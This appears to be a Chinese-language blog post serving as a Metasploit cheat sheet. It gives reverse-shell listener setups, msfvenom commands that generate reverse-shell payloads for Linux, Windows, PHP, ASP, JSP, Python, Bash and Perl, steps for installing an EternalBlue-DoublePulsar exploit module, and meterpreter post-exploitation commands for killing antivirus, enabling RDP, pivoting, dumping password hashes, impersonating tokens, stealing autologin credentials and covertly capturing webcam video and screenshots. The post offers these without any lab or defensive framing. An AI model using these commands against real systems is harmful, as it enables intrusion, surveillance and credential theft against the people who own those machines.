• MSF常用命令备忘录


    msf下的命令

    set session x:设置要攻击的session
    
    #监听端口反弹PHP shell
    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set LHOST
    set LPORT
    run
    #end
    
    #windows/shell_reverse_tcp模块可创建具有meterpreter功能的各版本shellcode,比如Asp、Aspx、msi、vbs、war
    #使用windows/shell_reverse_tcp反弹shell
    show payloads
    use windows/shell_reverse_tcp
    set LHOST
    set LPORT
    save
    generate -h    #查看具体命令
    generate -t asp #生成asp的shellcode
    #监听
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST
    set LPORT
    run
    #将shell上传后访问
    #end

    meterpreter下的命令

    ps:获取目标机正在运行的进程
    getpid:查看meterpreter shell的进程号
    migrate 448:把meterpreter shell移动到PID为448的进程中
    kill 984:杀掉PID为984的进程
    run post/windows/manage/migrate:自动寻找合适的进程迁移
    sysinfo:查看目标系统信息
    run post/windows/gather/checkvm:检查目标是否运行在虚拟机上
    idletime:查看目标机最近的运行时间
    route:目标机完整的网络设置
    getuid:查看当前用户名
    background:将当前会话放到后台(适合在多个meterpreter会话的场景下使用)
    run post/windows/manage/killav:关闭目标机系统杀毒软件
    run post/windows/manage/enable_rdp:开启目标机3389端口
    run post/windows/manage/autoroute:查看目标机的本地子网情况
    background->route add xxx xxx(添加路由)->route print(查看路由)
    ↑[路由添加到已攻陷的主机的路由表中,就可以借助被攻陷的主机对其他网络进行攻击]
    run post/windows/gather/enum_logged_on_users:列举当前有多少用户登录了目标机
    run post/windows/gather/enum_applications:列举安装在目标机上的应用程序
    run windows/gather/credentials/windows_autologin:抓取自动登录的用户名和密码
    load espia(加载espia插件)->screengrab(抓取目标机的屏幕截图)
    screengrab(也可直接使用screengrab命令抓取目标机的屏幕截图)
    webcam_list:查看目标机是否有摄像头
    webcam_snap:打开目标机摄像头拍一张照片
    webcam_stream:抓取目标机视频
    shell:进入目标机shell
    exit:停止meterpreter会话
    pwd/getwd:查看当前处于目标机哪个目录
    getlwd:查看当前处于本地的那个目录
    ls:列出当前目录的所有文件
    cd:切换目录
    search -f *.txt -d c::搜索C盘中所有txt文件(-f指定搜索文件模式,-d指定目录)
    download c:	est.txt /root:下载目标机c盘的test.txt文件到本机root下
    upload /root/test.txt c::上传本地root下test.txt文件到目标机c盘下
    getsystem:提权
    
    #假冒令牌↓
    #有两种类型令牌:
    #Delegation Tokens(授权令牌,支持交互式登录,例如远程桌面登录)
    #Impersonation Tokens(模拟令牌,非交互式的会话)
    在incognito下假冒
    use incognito->list_tokens -u:列出可用的token
    impersonate_token xxxx\system:假冒xxxx用户进行攻击(要用两个)
    #end
    
    hashdump:导出目标机的hash
    run windows/gather/smart_hashdump:导出域所有用户的hash

    移植并利用MS17-010(windows 2003)漏洞利用代码

    #MSF中MS17-010不支持windows 2003
    git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
    将Eternalblue-Doublepulsar-Metasploit文件夹下的eternalblue-doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb下
    msfconsole->reload_all   #在MSF下重新加载全部文件
    search eternalblue-doublepulsar    #现在就可以搜到该脚本了

    利用msfvenom生成shell的命令

    Linux:
    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
    
    Windows:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
    
    PHP:
    msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
    
    cat shell.php | pbcopy && echo '<?php ' | tr -d '
    ' > shell.php && pbpaste >> shell.php
    
    ASP:
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
    
    JSP:
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
    
    Python:
    msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
    
    Bash:
    msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
    
    Perl:
    msfvenom -p cmd/unix/reverse
    _perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

  • 相关阅读:
    【项目】项目1
    Python脚本1
    Python基础24
    Python基础23(习惯)
    01-Spring(1)
    12-Shell(2)
    11-Shell(1)
    10-搭建EE环境
    09-常用指令(3)
    08-常用指令(2)
  • 原文地址:https://www.cnblogs.com/shisana/p/13493509.html
Copyright © 2020-2023  润新知